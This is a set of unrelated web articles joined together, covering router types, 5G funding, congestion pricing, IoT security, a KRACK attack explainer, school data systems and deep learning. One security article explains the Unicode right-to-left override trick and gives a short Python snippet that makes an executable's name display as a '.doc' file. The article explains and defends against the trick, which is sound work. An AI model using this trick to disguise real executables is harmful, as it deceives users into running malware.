Note: a LAN is a wired local area network established by a wired router; a WLAN is a wireless local area network established by a wireless router.
Edge Router VS Core Router
Edge routers are located at the boundaries of a network and distribute packets across multiple networks, keeping communication flowing between them, whereas a core router operates within a single network and transfers large amounts of data at top speed.
As the name suggests, an edge router is located at the edge or boundary of a network, usually connected to the network of an Internet service provider (ISP) or other organization, and it distributes packets across multiple networks, but not within the same network. They can be wired or wireless routers, and their job is to keep your network in smooth communication with other networks. Besides, the edge router can connect to the core router.
In contrast to edge routers, core routers distribute packets within the same network rather than across multiple networks. They run on the backbone of the Internet, and their job is to carry out heavy data transfers. A core router supports the routing protocols used in the network core and can drive a variety of communication interfaces at the highest transmission speeds, allowing all IP packets to move at full speed. In some cases, core routers also connect distribution routers from multiple large enterprise or community locations, so high performance is a basic requirement for core routers.
VPN Router
Generally speaking, a VPN router can be seen as a normal gigabit router with VPN client software installed on it. Every device that connects to the VPN router is protected by the VPN at all times. Whether at home, in the office or across a company, a VPN router brings the benefits of VPN connections to all devices. The main functions of a VPN router are as follows:
Providing unlimited connectivity.
When connecting to a VPN server via a router, you can use any number of devices. In addition, you can share encrypted connections with friends and visitors without worrying about sharing accounts (which is generally prohibited under the terms of service of VPN services).
Providing better platform adaptability.
Popular online media like Apple TV, Amazon Fire TV or Chromecast currently don't support VPN protection. However, you can still add them to the list of protected devices by connecting them to your VPN router.
Unblocking application and content.
Are you currently in a country that blocks certain applications or contents? A VPN router enables you to bypass the restrictions and connect to the Internet via an encrypted VPN tunnel through another country entirely.
Logging in once.
Many people often forget to log in to their VPN or set up their clients to run automatically at startup. Once you set up your VPN router, you don't have to worry about this - you just log in once, and that's it for good! If you use a VPN frequently on multiple devices, this is a practical and effective solution.
Today, with the rapid development of the Internet, network incidents appear frequently, and network security has become a primary concern for individuals, families and enterprises. The emergence of VPN routers is good news for them: a strongly protected network channel can prevent many information leakage incidents. In the future, the VPN router is likely to be the darling of the market and the first choice for many router buyers.
Routers are a mainstream product in the network communications market, so it pays to learn as much about them as possible. We hope this overview of the basic information and characteristics of each router type makes choosing the right router a more comfortable experience.
Malware authors are known to try various obfuscation techniques in order to hide their malware. The Unicode Right-to-Left trick (RLO), which has been known for quite some time, has been reported again by security firm F-Secure, showing its resurgence.
In their report, a signed Apple program was disguised to hide its true nature and install a piece of malware.
This prompted me to examine this technique in greater detail. This is a neat trick that deserves a proper explanation.
To understand how this works you need to know what Unicode is: an international encoding standard for use with different languages and scripts.
This allows computers, in our case, to display characters in special ways. The feature abused here is the “Right-to-Left” function. This would most commonly be used when displaying a language that is read in such a fashion, such as say Arabic, or Hebrew, to name a few.
This means that a cleverly named executable, manipulated in such a way, could be made to appear as something other than what it really is.
Windows XP requires specific configuration changes to enable support for this feature. We can use it to demonstrate what the file looks like, if an operating system does not know how to display RLO properly. This is useful to visualize where the flip point is inserted. Here is Windows XP, displaying my test file:
The white box in the filename is the RLO going unrecognized, so the name is not read from right to left. This makes it easy to spot our file as an executable. Once the flip occurs, the “cod” will appear as “.doc”, completing the illusion.
Native support for this feature has been present since Windows Vista. Here is the same file, on a Windows 7 system:
I chose a filename that completed the illusion but didn’t look suspicious. You could also use multiple RLO insertions to accommodate a different name that would not need to end in “exe.” I also took it a step further by modifying the embedded icon of the executable to make it appear as a Word document. Another common file extension used with this technique is “.scr,” which is used for screen savers.
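The mechanics of the trick can be sketched in a few lines. The filename below is hypothetical, and the rendering function is only a crude simulation of what a bidirectional-text-aware file manager displays; the point is that the file on disk really does end in ".exe" while the displayed name appears to end in ".doc":

```python
RLO = "\u202E"  # Unicode RIGHT-TO-LEFT OVERRIDE control character

# The file on disk is genuinely a Windows executable...
real_name = "annual_report" + RLO + "cod.exe"
assert real_name.endswith(".exe")

def naive_bidi_render(name):
    """Crude simulation of a BiDi-aware renderer: characters after
    the RLO mark are displayed in reverse order."""
    if RLO in name:
        head, tail = name.split(RLO, 1)
        return head + tail[::-1]
    return name

# ...but a renderer honoring the override shows it as a document.
print(naive_bidi_render(real_name))  # annual_reportexe.doc
```

This is why the article's "cod" flips into ".doc": the override simply reverses the display order of everything after the control character, while the operating system still treats the file by its true extension.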
Although this particular example was crafted for the PC, on a PC, I decided to copy it over to other machines in our lab, to see how it would be displayed. Here is the same file, on a Linux machine:
Since Linux cannot execute Windows PE files, the threat is greatly reduced, but the file name is still shown with the “.doc” extension. Examining the same file from a command-line environment reveals its true nature:
And again, on a mac:
As it was originally crafted for a PC, this doesn't work very well. The OSX command line also displays the file correctly:
However the autocomplete feature built into the command line of OSX briefly shows the file the other way:
A common vector for such files is e-mail, where executables are disallowed unless compressed in a zip. I tried sending the file via Gmail, and received an interesting error:
This message is Gmail, informing me that executables aren't allowed.
And there you have it! Right-to-left functionality abused to try and cloak the file extension of an executable. This is by no means a new vulnerability, but still an interesting vector. | <urn:uuid:e555317e-0537-49a3-a533-1576e1b9cb48> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2013/07/bi-directional-trickery | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00155.warc.gz | en | 0.964666 | 699 | 3.203125 | 3 |
Trap #16 Just the Architecture Diagram
Architecture Diagrams are a communication technique not an architecture development tool.
Enterprise architects at the top of their game develop architecture. An enterprise architecture is useful while it is being developed, and after the stakeholder approves it.
We use architecture diagrams. They are only part of the delivery of useful architecture. Often a small part.
We have all seen a practitioner show up with a carefully drafted architecture diagram that showed how some elements of a system should relate in the future. We reverently look at the picture and appreciate the elegance. Then we go about creating a system that bears only a superficial relation to the diagram.
Why? Everything that comprises a useful architecture was missing:
- gaps that indicate what change is needed
- controls that mitigate risks to the enterprise
- specifications that constrain designers, implementers, operators and future architects
- anything that highlights how the future ecosystem will deliver better value than what we have today
These carefully crafted diagrams typically represent only part of the complete ecosystem. Too often the diagram is filled with arbitrary design choices made to support the practitioner’s biases.
Good architecture supports informed decision during the architecture development process and constrains design, implementation and operational choice. A diagram might do these things.
You can't govern from a box & line
Usually, picture-based delivery short-circuits the rich understanding that evolves during development in the minds of Stakeholders, decision makers and key contributors. This damage occurs because few diagrams can represent more than a single Concern. When we focus on these diagrams, we implicitly avoid complex trade-offs and become fixated on a single optimization.
Diagrams masquerading as architecture are replete with unjustified specification and control. Unjustified because the rule only ‘stands alone.’ Standing free of context, the diagram specifies a service provider, software, or an operational location. Good architects see this and have to hold back the cry of ‘Why?’
Best practice links a specification explicitly to a goal, objective, or other requirement and the design choice to the specification. Without this linkage, how can we assess the fitness of the design choice to the objective?
We’ve all heard the excuse, ‘but the diagram is just a View.’ In our EA Capability practice, our eyes roll. If it is an architecture view, where is the repository that maintains the information highlighting concerns, requirements, preferences, relationships, and analysis? You guessed it: in the practitioner’s head, where peer review and reuse are impossible.
Conexiam Navigate uses the Solution Development Notebook, or SDN, to actively support the change and implementation teams and to help portfolio managers control change initiatives and measure value. In every SDN the architect needs to identify the essential guidance for the implementer, the owner, and the portfolio manager.
The UK government is awarding £16 million to three universities to develop a cutting-edge 5G test network.
With all three chosen for their international reputation in the field of 5G, King’s College London, the University of Surrey, and the University of Bristol will be responsible for building the network, which will be used by academics and commercial partners to trial and demonstrate the benefits of the next generation of mobile technology.
5G is expected to deliver reliable ultra-fast mobile connectivity, with the ability to process huge amounts of data and support complex applications for tomorrow’s mobile phones – for example, sending virtual reality (VR) 3D TV clips to mobile devices.
The technology should also be significant in supporting the growing number of connected devices and IoT applications that are emerging, in areas such as autonomous vehicles, robotic deliveries and other smart city developments.
Market research firm, IHS Markit, has predicted that 5G will enable $12.3 trillion of global economic output by 2035. This is one assessment among many that are fueling the growing buzz around the potential for 5G. Given the weight of these expectations, the government estimates that a world-class 5G test network could add up to £173 billion to the UK economy by 2030.
However, the UK government has already begun its work to ensure that the country can take advantage of these benefits. In the 2016 Autumn Statement, it announced a £1 billion package to boost the UK’s digital infrastructure; a new center of 5G expertise within the freshly renamed Department for Digital, Culture, Media and Sport; and a new 5G Testbeds and Trials program.
A chance to lead the 5G field
The announcement of this test network is the first part of a four-year program of investment and collaboration in the government’s new 5G Testbeds and Trials program. The universities will work together to create three small-scale mobile networks, which together will form the test network. Each network will have a number of the elements expected in a commercial 5G network – including mobile signal receivers and transmitters and the technology to handle 5G signals – to support trials of its many potential uses.
The government says the project will build on existing research and help to make the case for timely deployment of fifth generation mobile technology in the UK. The hope is that this trial will ensure the UK is ready to take full advantage of 5G when it is finally delivered, which many experts predict will be 2019/2020 at the earliest.
Speaking about the potential benefits to the UK, minister for digital, Matt Hancock, said: “We want to be at the head of the field in 5G. This funding will support the pioneering research needed to ensure we can harness the potential of this technology to spark innovation, create new jobs and boost the economy.”
Should the test network prove a success, the investment is also aiming to deliver a 5G end-to-end trial in early 2018. According to the government, this could be, for example, a trial in which a signal is sent from a mobile device, such as a phone or in a car, to a data center and back again. It will test the capability of the technology to make an application or service work in a real-world environment.
Professor Rahim Tafazolli, University of Surrey’s 5G Innovation Centre director, is the project lead and will be working with Professor Dimitra Simeonidou from the University of Bristol, a specialist in smart city infrastructures, and Professor Mischa Dohler from King’s College London, a wireless communications specialist, to deliver the project.
Speaking about the network, Tafazolli suggested the investment would ensure the UK is able to exploit the benefits of mobile technology.
“This exciting program builds on significant investment and a strong foundation of 5G research and development across the three institutions,” Tafazolli said. “The program will maintain and extend the UK’s leadership position in the race to transform many aspects of everyday life and business through digital transformation.” | <urn:uuid:a3aa401e-5476-4647-acc4-21f6bbbaca53> | CC-MAIN-2022-40 | https://internetofbusiness.com/uk-government-5g-network/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00355.warc.gz | en | 0.93635 | 860 | 2.609375 | 3 |
New research suggests big data and machine learning can create an equitable approach to tolling and improve traffic congestion.
Researchers have proposed tackling both urban traffic jams and economic inequality by using big data and artificial intelligence to tweak congestion pricing on toll roads.
Some cities have used congestion pricing for years, but its widespread adoption could make commutes worse for low-income drivers who cannot afford to pay to use the faster roads. The researchers suggested refunding some of the money from highway tolls in a way that ensures equity; this way, lower income drivers would get more money back than their more affluent counterparts.
“We can achieve both the goals of equity and of efficiency by enabling people to trade time for money,” Devansh Jalota, a doctoral candidate with Stanford University Autonomous Systems Laboratory said in a news release. “Some people can reduce their travel time by paying additional tolls, while others are compensated for taking longer routes.”
Although refund schemes have been around for the last 30 years, Jalota said big data and machine learning can now make a difference.
“[These advances] have enabled us to design better autonomous vehicles by learning patterns in the behavior of human drivers. These tools can play a similar role here in calibrating the pricing models to make our proposed schemes work,” he said.
The idea has two objectives: making sure no one ends up paying more than before -- after accounting for the financial benefits of saving time in traffic -- and designing a system that improves equity outcomes for lower income drivers. Those drivers, especially those who choose slower or less direct routes, would get back more than they have paid. The wealthier drivers would get lower refunds, and some would not get refunds at all.
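A toy sketch of such a redistribution scheme follows. The incomes, tolls, and the inverse-income weighting rule are our own illustrative assumptions, not the researchers' actual model, which is calibrated per city with learned behavioral data; the sketch only shows how the same toll revenue can be refunded progressively:

```python
# Toy redistribution sketch: refunds weighted inversely to income,
# so lower-income drivers receive back a larger share of revenue.
# All figures are hypothetical.

drivers = {
    "A": {"income": 30_000, "toll_paid": 10.0},
    "B": {"income": 60_000, "toll_paid": 10.0},
    "C": {"income": 120_000, "toll_paid": 10.0},
}

revenue = sum(d["toll_paid"] for d in drivers.values())       # 30.0 total
weights = {name: 1 / d["income"] for name, d in drivers.items()}
total_w = sum(weights.values())

# Each driver's refund is their weight's share of total revenue.
refunds = {name: revenue * w / total_w for name, w in weights.items()}

for name, refund in refunds.items():
    net = drivers[name]["toll_paid"] - refund
    print(f"driver {name}: refund {refund:.2f}, net cost {net:.2f}")
```

Under these assumed numbers, the lowest-income driver's refund exceeds the toll paid, a net gain, which mirrors the article's point that some drivers are compensated for their time while all the collected revenue is redistributed.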
The researchers explained that this approach will require a massive amount of data and computation; plus, each city would need its own pricing scheme and specific traffic behavioral model. Moreover, travelers in different cities value money and time differently, so Jalota said the next step would require understanding city-specific driver behavior and parameters for refunds and redistribution.
Marco Pavone, a professor of aeronautics and astronautics and director of the Stanford Autonomous Systems Laboratory, said the result should not only reduce congestion, but also put more of the toll revenue toward achieving any city’s equity goals.
“This really does seem to be a win-win,” Pavone said. “Instead of exacerbating existing inequities, road pricing and refunds could both protect the most vulnerable and improve the efficiency of our transportation system.”
NEXT STORY: Census 2020 gets its first challenges | <urn:uuid:249e2b2d-492c-4334-aeb6-58a5c44b4d39> | CC-MAIN-2022-40 | https://gcn.com/data-analytics/2022/01/can-ai-powered-congestion-pricing-improve-transportation-equity/360891/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00355.warc.gz | en | 0.948776 | 534 | 2.890625 | 3 |
By Neal Bellamy, IT Director at Kenton Brothers
Hacking, at its root level, is a person using a computer program for a purpose that is not intended. It’s like discovering a person walking a dog and then using the dog to attack someone. That wasn’t the intent of the person walking the dog, but the hacker was able to take control. In order to “hack”, the attacker must find a weakness in the software and then exploit the weakness. In the ever-evolving game of cat and mouse, weaknesses get found and software gets modified to patch those weaknesses.
Most successful hacks are possible because the software on a device is outdated.
Even though previous weaknesses have been fixed with software updates, the newest software has not yet been installed, and new weaknesses are found that can be exploited.
In other areas of information technology (IT), we have tools to detect and notify us when software needs to be updated. Most people are probably familiar with Windows Update, the little icon on the lower right that tells us new software is ready to be installed. There are many other systems that can also notify and even update the software automatically. But there is an area of IT that generally gets missed…
The Internet of Things
The Internet of Things (IoT) is defined as “a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.”
IoT has been around for decades. We’ve used and interacted with IoT devices in our offices for as long as I can remember. Things like copiers, scanners, and credit card machines are all examples of devices that usually are on the network and can send and receive data.
In the commercial security world, cameras and access control panels are also IoT devices. Anything that you can interact with without having to touch it is an IoT device. Can you adjust your thermostat from anywhere in the world? If so, it’s an IoT device. IoT is transforming our world and has been for many years now, making our lives more convenient and more connected. The security risk with IoT is that most devices are installed and never updated. If a security weakness is detected, the patched software may never get installed… leaving that device wide open to compromise.
Most companies spend a lot of IT time and money protecting servers, firewalls, and desktops to make sure that they have the latest software updates and are secure. But IoT devices are usually left out of the discussion. IoT devices are now one of the largest attack vectors for malicious hackers. These “set and forget” devices are often left unprotected and sometimes connected directly to the internet. (Please don’t connect anything except a firewall directly to the internet; there are better ways.) As a whole, we have to do a better job of protecting these devices.
Part of the answer for the physical security world could be Viakoo’s new offering.
Viakoo has been offering camera, access control, and IoT monitoring for quite a while.
At its core, Viakoo catalogs all of your devices and monitors them at varying levels to make sure they are operational. And now Viakoo is taking it to the next level, offering IoT risk evaluation and IoT risk remediation. In evaluating the risk of each IoT device, Viakoo looks at the password, security certificates, and installed firmware version of each device. On supported devices, passwords can be changed, and because Viakoo is already connected to some video management software (VMS), it can even change the password in the VMS so that video is not lost. Viakoo can also install new certificates on supported IoT devices so that they can be trusted at a higher level.
Viakoo can push new firmware to all the devices across the network. Since Viakoo's architecture is designed to span multiple sites and buildings, firmware can be pushed across the entire corporate footprint at the same time. Viakoo works across many hardware and software manufacturers, which most competing systems cannot yet do, making Viakoo a good choice for almost any business with IoT devices.
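To illustrate the kind of check such a tool performs, here is a hypothetical Python sketch of a firmware audit. The device fields, model names, and version thresholds are invented for illustration; this is not Viakoo's actual API or data model.

```python
# Hypothetical minimum approved firmware versions per device model.
MIN_FIRMWARE = {"cam-x100": (2, 4, 0), "door-ctl-7": (1, 9, 2)}

def parse_version(text):
    """Turn a version string like '2.3.1' into a comparable tuple (2, 3, 1)."""
    return tuple(int(part) for part in text.split("."))

def outdated_devices(inventory):
    """Return the IDs of devices whose firmware is below the approved minimum."""
    flagged = []
    for device in inventory:
        minimum = MIN_FIRMWARE.get(device["model"])
        if minimum and parse_version(device["firmware"]) < minimum:
            flagged.append(device["id"])
    return flagged

# Invented sample inventory.
devices = [
    {"id": "lobby-cam", "model": "cam-x100", "firmware": "2.3.9"},
    {"id": "dock-cam", "model": "cam-x100", "firmware": "2.4.1"},
    {"id": "east-door", "model": "door-ctl-7", "firmware": "1.9.2"},
]
print(outdated_devices(devices))  # ['lobby-cam']
```

A real system would pull the inventory from the network automatically and trigger a firmware push for each flagged device.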
Viakoo is a simple subscription-based software that can catalog, evaluate and secure all of your IoT devices. If you want help in securing your IoT Devices, please give us a call! | <urn:uuid:a3f1f730-92ca-4bac-a346-22bda3cefd9c> | CC-MAIN-2022-40 | https://kentonbrothers.com/category/commercial-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00355.warc.gz | en | 0.952177 | 943 | 2.9375 | 3 |
What is KRACK?
KRACK is short for Key Reinstallation Attack. It is an attack that leverages a vulnerability in the Wi-Fi Protected Access 2 (WPA2) protocol, which keeps your Wi-Fi connection secure. For hackers, KRACK is a tool they use when in close range of one of their targets to access encrypted data.
When KRACK was first disclosed in 2017, it shattered the perception that WPA2 was secure. This meant that the Wi-Fi “haven” in people’s homes had been penetrated. As researchers investigated the threat, they discovered that many types of devices were vulnerable, including those running iOS, Android, Linux, macOS, and Windows.
However, despite the weaknesses found in WPA2, there are still ways to use the internet without constantly worrying about hackers penetrating your system.
What Is WPA2?
WPA2 stands for Wi-Fi Protected Access 2, which is a protocol that secures Wi-Fi networks. WPA2 makes use of strong encryption intended to secure communications between a computer, tablet, phone, or other device and the device that provides it with Wi-Fi.
In most situations, if someone were to intercept the communications between the end device and the Wi-Fi access point, the encryption would make it extremely difficult to decode and use.
How Do KRACK Attacks Work?
A WPA2 connection begins with a four-way handshake, which is a process requiring the exchange of four messages between an access point and a device to generate an encryption key and encrypt data. The full four-way handshake is only required when the device first connects to the access point. To make subsequent connections faster, only step three of the four-way handshake has to be sent again.
Whenever a user connects to a Wi-Fi network they have connected with in the past, the network only resends this third portion of the handshake. To make sure the connection is successful, this step can be repeated multiple times. This is where the vulnerability that KRACK exploits comes into play.
An attacker can create a clone of a Wi-Fi network the target has connected to in the past. This clone provides the target with internet access, so the target does not even notice they are being attacked. When the target tries to reconnect, the attacker forces them onto the clone network and then replays the third message of the handshake again and again. Each time the target's device reinstalls the key, the cipher's nonce is reset, so the same keystream is reused to encrypt different packets. By collecting and comparing these packets, the attacker can progressively decrypt the traffic the encryption key was supposed to protect.
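Why is reusing a keystream so damaging? The toy sketch below uses a plain XOR "cipher" standing in for WPA2's real per-packet encryption. It shows that when two packets are encrypted with the same keystream, XORing the ciphertexts cancels the keystream out entirely, even though the attacker never learns it:

```python
import os

def xor_cipher(keystream: bytes, message: bytes) -> bytes:
    """Toy stream cipher: ciphertext = message XOR keystream."""
    return bytes(k ^ m for k, m in zip(keystream, message))

keystream = os.urandom(24)   # stands in for WPA2's per-packet keystream
packet1 = b"transfer $100 to alice  "
packet2 = b"my password is hunter2  "

c1 = xor_cipher(keystream, packet1)
c2 = xor_cipher(keystream, packet2)   # nonce reuse: SAME keystream again!

# XORing the two ciphertexts cancels the keystream, leaving only
# the XOR of the two plaintexts:
leak = bytes(a ^ b for a, b in zip(c1, c2))
assert leak == bytes(a ^ b for a, b in zip(packet1, packet2))

# With one plaintext known or guessed (a "crib"), the other falls out:
recovered = bytes(l ^ p for l, p in zip(leak, packet1))
print(recovered)  # b'my password is hunter2  '
```

Real WPA2 ciphers are more sophisticated than a bare XOR, but the underlying failure mode under nonce reuse is the same, which is why KRACK's forced key reinstallation is so dangerous.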
Once the WPA2 encryption has been broken, the hacker then uses software designed to take all the data that gets sent by the target over that network. If a website uses secure sockets layer/transport layer security (SSL/TLS), the attack will not work.
However, not all websites use these protocols on every version of their site. A hacker may therefore use an "SSL-stripping" tool to force the target onto the HTTP version of a website, which is not protected by SSL/TLS. If the victim does not notice that they have been pushed onto an unprotected page, they may proceed to enter sensitive information that the hacker can use to their advantage, sell, or otherwise exploit.
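As a rough illustration of what such a downgrade looks like from the client side, here is a hypothetical Python helper that flags two warning signs: a page served over plain HTTP, and a missing HSTS (Strict-Transport-Security) header, which is what tells browsers to refuse HTTP downgrades. The heuristic is deliberately simplified.

```python
def downgrade_risk(url, headers):
    """Return human-readable warnings about HTTPS downgrade risk.

    `headers` is a dict of HTTP response headers; an empty list means
    no obvious risk was spotted by this (simplified) check.
    """
    warnings = []
    if not url.lower().startswith("https://"):
        warnings.append("page served over plain HTTP: traffic is readable")
    lowered = {k.lower(): v for k, v in headers.items()}
    if "strict-transport-security" not in lowered:
        warnings.append("no HSTS header: browser may accept an HTTP downgrade")
    return warnings

print(downgrade_risk("http://bank.example/login", {}))
print(downgrade_risk("https://bank.example/login",
                     {"Strict-Transport-Security": "max-age=31536000"}))  # []
```

The hostnames here are placeholders; in practice the headers would come from an actual HTTP response.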
For a KRACK attack to succeed, the hacker needs to be close to the target. The proximity is necessary because the target and the hacker have to share the same Wi-Fi network.
Why Are KRACK Attacks Dangerous?
Every day, whether you are at work, in your home, or in public, you connect to Wi-Fi. You sign on not only with your personal devices but also devices within your home that are part of the Internet of Things (IoT). Everything that connects to Wi-Fi is therefore at risk of being hacked.
During a hack, the attacker can access usernames, passwords, data, bank details, emails, and more. They can then use this information for personal gain or to extort the victim. They can also sell it on the dark web for profit.
The safest way to connect to the internet is to use a virtual private network (VPN), particularly when you are in a public area. Sometimes, people opt for a free VPN to save money. Free VPNs can present other issues because they have their own vulnerabilities. It is best to use a secure, paid option, such as those provided by Fortinet.
It is also advisable to avoid using public Wi-Fi whenever possible. Even if the connection has a password, because so many people have that password, it is essentially available to any hacker who wants it. Even if you are not connected to public Wi-Fi, you should make sure your device is updated and patched with the most recent firmware available. Your router should have the most recent patches as well.
How Fortinet Can Help
With a Fortinet VPN solution powered by FortiGate, you can securely use Wi-Fi without having to worry about your connection being “KRACK’d.” With FortiGate, you get a secure tunnel through which all of your traffic is routed. Inside the tunnel, your information is encrypted. This means that even if a hacker were to use KRACK to access your data, it would be encrypted and therefore useless. The hacker would most likely move on to a softer target.
Fortinet also offers FortiAPs, which are secure wireless access points that can be added to your network. FortiAPs are enabled with the Fortinet Security Fabric, which ensures visibility, integrated threat intelligence, and automated protection to shield your devices from KRACK.
What does KRACK mean?
KRACK is short for Key Reinstallation Attack. It is an attack that leverages a vulnerability in the Wi-Fi Protected Access 2 (WPA2) protocol, which keeps your Wi-Fi connection secure.
How does a KRACK attack work?
WPA2 uses a four-stage handshake during the connection process, but only for the first time the user connects. During subsequent connections, only the third step in the handshake gets sent again. During a KRACK attack, the attacker clones the Wi-Fi network and then sends that third step in the handshake again and again to the victim. Each time the victim accepts the connection, a portion of data gets decrypted by the attacker. The bad actor can then collect these communications, aggregate them, and use them to break the encryption key. | <urn:uuid:98025eeb-cd19-4f58-af82-6a56d9c12996> | CC-MAIN-2022-40 | https://www.fortinet.com/tw/resources/cyberglossary/krack-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00555.warc.gz | en | 0.9465 | 1,385 | 2.9375 | 3 |
With the shift to virtual and hybrid learning models, schools have been struggling to keep track of their students online, regularly asking themselves: “What on earth is going on with our virtual students?”
Schools are desperately trying to understand which students are engaged and which students may be falling through the cracks. This problem arose because legacy learning indicators like attendance and behavioral data are inaccessible in a digital setting and many schools lack the infrastructure to collect and analyze this new digital learning data.
Much of the guidance we give to schools focuses on which tools and indicators they should be using to rethink measuring student engagement. Variations of “butts in seats” metrics are less useful in the digital environment, and many of the schools we work with have highlighted difficult conversations in parent conferences.
In one case, a parent reported that their child was online seven hours a day doing something on their device, yet internal metrics showed a coursework completion rate of just 5%. It is one thing to measure how many hours a student spends on a device, but an entirely different task to quantify how engaged that student is with learning.
Further, the digital divide complicates this metric when thinking about students who may have limited times when they can access a device or the internet.
Our leading advice to schools is to measure engagement by whether students complete assignments. Coursework completion rate is a robust, evidence-backed indicator for identifying at-risk students, and it reveals more nuance in learning and progression than attendance or minutes online alone.
It is a metric that can be used to measure not only individual student engagement, but also to identify trends across courses, subjects, grade levels, and schools.
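The metric itself is simple to compute. Here is a minimal Python sketch with invented sample data; a real system would pull assignment records from the student data platform and could aggregate the same function by course, subject, or grade level.

```python
def completion_rate(assignments) -> float:
    """Percentage of assigned work that was completed."""
    if not assignments:
        return 0.0
    done = sum(1 for a in assignments if a["completed"])
    return 100.0 * done / len(assignments)

def flag_at_risk(students, threshold: float = 50.0):
    """Names of students whose completion rate falls below the threshold."""
    return [name for name, work in students.items()
            if completion_rate(work) < threshold]

# Invented sample data: 10 assignments for one student, 20 for the other.
students = {
    "avery": [{"completed": True}] * 9 + [{"completed": False}],        # 90%
    "blake": [{"completed": True}] * 1 + [{"completed": False}] * 19,   # 5%
}
print(flag_at_risk(students))  # ['blake']
```

Note how this captures the scenario above: a student can be "online" for hours while completing almost nothing, and the completion rate surfaces that immediately.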
Schools need to rethink what their student information system should offer. Is it just a place to manually enter student data? Or should it be a platform that serves educators and students by using data to inform instruction, best practices, and ultimately to guide action?
We believe that schools should be shifting from student information systems to student data platforms that enable different stakeholders to tap into the data they need safely and securely.
Finally, we are seeing the following broad investment trends in IT:
Apps to engage students in remote, hybrid, and blended learning settings
Platforms to measure student engagement with digital learning
Privacy and safety tools to protect students online
Are K–12 schools fully prepared for today’s digital and physical emergencies? According to a recent federal report, schools are becoming safer, partially through the proactive use of technology. Skyward, an administrative software provider committed to a better experience for every user, is helping lead improvements by encouraging school leaders to leverage an existing tool, their student information systems, to amp up security and ensure protection of their sensitive data.
Although statistics suggest schools are becoming safer, a recent poll indicates parents feel schools are less safe today than they were 20 years ago. Skyward’s SIS aims to alleviate those concerns by giving parents the ability to provide student information such as protection orders against unwanted visitors and reunification instructions to ensure students are paired with the correct guardian in the event of an emergency. Parents can also enter vital health information regarding student allergies and medications, which school staff can view and act on during medical emergencies.
“Skyward continues to help us keep students safe with speed and accuracy—the two most important factors during an emergency,” said Jacque Deckard, data management coordinator at Mooresville School Corporation in Indiana.
Skyward’s SIS also provides a real-time notification system, which can send important messages to students, parents, and staff during an emergency. Additionally, school leaders can set up an anonymous tip line within the notification system, offering individuals the opportunity to report incidents such as bullying, self-harm, and possible threats to the school.
“It’s important for our students, parents, and faculty to be heard and feel comfortable. Thanks to Skyward, this is possible because they can remain anonymous and still voice safety concerns,” said Lora Lovelace, data management coordinator at Center Grove Community Schools in Indiana.
While physical threats are at the forefront of security concerns, Skyward is also continuing to protect districts against data breaches. In 2019, dozens of cybersecurity incidents affected K-12 schools, following 122 similar breaches at schools in 2018. By partnering with ISCorp, a hosting provider, Skyward offers districts the opportunity to host their sensitive information on a secure cloud service with 24/7 monitoring and fail-safe backups.
“When students and faculty walk through school doors, they deserve to feel safe and confident their information is protected,” said Scott Glinski, CEO of Skyward. “As a system that many districts use, we recognize our role as part of the solution, which is why we will continue evolving our software to defend against all threats, both digital and physical.” | <urn:uuid:6bd072b8-2a3a-4d4a-be35-f8859aa82768> | CC-MAIN-2022-40 | https://educationitreporter.com/tag/student-information-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00555.warc.gz | en | 0.960926 | 1,004 | 2.765625 | 3 |
“Deep learning” is the new buzzword in the field of artificial intelligence. As Natalie Wolchover reported in a recent Quanta Magazine article, “‘deep neural networks’ have learned to converse, drive cars, beat video games and Go champions, dream, paint pictures and help make scientific discoveries.” With such successes, one would expect deep learning to be a revolutionary new technique. But one would be quite wrong.
The basis of deep learning stretches back more than half a century to the dawn of AI and the creation of both artificial neural networks having layers of connected neuronlike units and the “back propagation algorithm” — a technique of applying error corrections to the strengths of the connections between neurons on different layers. Over the decades, the popularity of these two innovations has fluctuated in tandem, in response not just to advances and failures, but also to support or disparagement from major figures in the field.
Back propagation was invented in the 1960s, around the same time that Frank Rosenblatt’s “perceptron” learning algorithm called attention to the promise of artificial neural networks. Back propagation was first applied to these networks in the 1970s, but the field suffered after Marvin Minsky and Seymour Papert’s criticism of one-layer perceptrons. It made a comeback in the 1980s and 1990s after David Rumelhart, Geoffrey Hinton and Ronald Williams once again combined the two ideas, then lost favor in the 2000s when it fell short of expectations. Finally, deep learning began conquering the world in the 2010s with the string of successes described above.
What changed? Only brute computing power, which made it possible for back-propagation-using artificial neural networks to have far more layers than before (hence the “deep” in “deep learning”). This, in turn, allowed deep learning machines to train on massive amounts of data. It also allowed networks to be trained layer by layer, using a procedure first suggested by Hinton. […]
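To make the idea concrete, here is a minimal back-propagation example in pure Python: a two-layer network learning XOR, the very function Minsky and Papert showed a one-layer perceptron cannot represent. This is a toy sketch; real deep learning frameworks automate these gradient computations across many more layers, and with only two hidden units the network can occasionally settle in a local minimum, though the loss still drops.

```python
import math
import random

random.seed(1)

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

# XOR dataset: inputs and target outputs.
data = [([0.0, 0.0], 0.0), ([0.0, 1.0], 1.0),
        ([1.0, 0.0], 1.0), ([1.0, 1.0], 0.0)]

# Random initial weights for a 2-input, 2-hidden, 1-output network.
w_h = [[random.uniform(-1, 1) for _ in range(2)] for _ in range(2)]
b_h = [random.uniform(-1, 1) for _ in range(2)]
w_o = [random.uniform(-1, 1) for _ in range(2)]
b_o = random.uniform(-1, 1)

def forward(x):
    h = [sigmoid(w_h[j][0] * x[0] + w_h[j][1] * x[1] + b_h[j]) for j in range(2)]
    y = sigmoid(w_o[0] * h[0] + w_o[1] * h[1] + b_o)
    return h, y

def mse():
    return sum((forward(x)[1] - t) ** 2 for x, t in data) / len(data)

loss_before = mse()
lr = 0.5
for epoch in range(5000):
    for x, t in data:
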